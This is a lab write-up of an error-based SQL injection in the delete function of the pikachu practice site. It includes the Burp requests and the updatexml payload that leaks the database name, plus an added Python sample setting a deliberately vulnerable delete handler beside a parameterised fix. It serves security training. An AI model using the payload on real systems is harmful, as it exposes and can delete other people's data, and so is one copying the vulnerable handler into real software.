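pikachu SQL injection: delete injection
Post a few messages on the message board.
A delete button appears next to each message; click it.
Intercept the request with Burp Suite. The request looks like this: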
GET /vul/sqli/sqli_del.php?id=57 HTTP/1.1
Host: 192.168.1.9:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.1.9:8080/vul/sqli/sqli_del.php
Cookie: security=high; PHPSESSID=fftr9buiig10nl6bda5f22li59
Upgrade-Insecure-Requests: 1
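The id=57 parameter looks like a possible injection point, so send the request to Repeater and modify it: append a ' after 57 and click Send. The response confirms the guess: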
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
So this is an injection point.
Next, append the following after 57:
or updatexml(1, concat(0x7e, database()), 0)
Select the value of id, right-click it, choose Convert selection, then URL, then URL-encode key characters, so that the selected text is URL-encoded:
GET /vul/sqli/sqli_del.php?id=57+or+updatexml(1,+concat(0x7e,+database()),+0) HTTP/1.1
Host: 192.168.1.9:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.1.9:8080/vul/sqli/sqli_del.php
Cookie: security=high; PHPSESSID=fftr9buiig10nl6bda5f22li59
Upgrade-Insecure-Requests: 1
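As you can see, every space has been replaced with +.
After sending the request, the database name is exposed in the same way (again relying on the fact that XPath does not recognize ~):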
XPATH syntax error: '~pikachu'
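The flaw exercised above and its fix, as an added example that is not code from the original post or from the pikachu project: the handler shape is assumed, sqlite3 stands in for the lab's MySQL database, and the table rows and function names are constructed for illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed sample rows; sqlite3 stands in for the lab's MySQL (assumption).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE message (id INTEGER PRIMARY KEY, content TEXT)")
    conn.executemany("INSERT INTO message VALUES (?, ?)",
                     [(56, "first"), (57, "second"), (58, "third")])
    return conn

def delete_vulnerable(conn, raw_id):
    # Assumed shape of the flawed handler: id concatenated unquoted into the
    # statement, and the driver's error text returned to the client.
    try:
        conn.execute("DELETE FROM message WHERE id=" + raw_id)
        return "deleted"
    except sqlite3.Error as exc:
        return str(exc)  # reflected error text is what the walkthrough reads

def delete_hardened(conn, raw_id):
    # 1) allow-list: plain decimal digits only; 2) bind the value as a parameter;
    # 3) generic failure message, details belong in server-side logs.
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        return "invalid id"
    try:
        cur = conn.execute("DELETE FROM message WHERE id = ?", (int(raw_id),))
        return "deleted" if cur.rowcount == 1 else "not found"
    except sqlite3.Error:
        return "request failed"

def count(conn):
    return conn.execute("SELECT COUNT(*) FROM message").fetchone()[0]

# The two modified id values sent in the walkthrough above.
PAGE_INPUTS = ["57'", "57 or updatexml(1, concat(0x7e, database()), 0)"]

if __name__ == "__main__":
    for raw in PAGE_INPUTS + ["57"]:
        print(f"{raw!r}: vulnerable -> {delete_vulnerable(make_db(), raw)!r}, "
              f"hardened -> {delete_hardened(make_db(), raw)!r}")
```

The hardened handler never lets the request value reach the SQL parser as syntax, and it returns no database error text, so neither the quote probe nor the error-based expression has anything to work with.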
Author: 明月照江江
Link to this article: https://www.cnblogs.com/gradyblog/p/16839039.html
Copyright: This work is licensed under the Creative Commons Attribution-NonCommercial-NoDerivs 2.5 China Mainland license.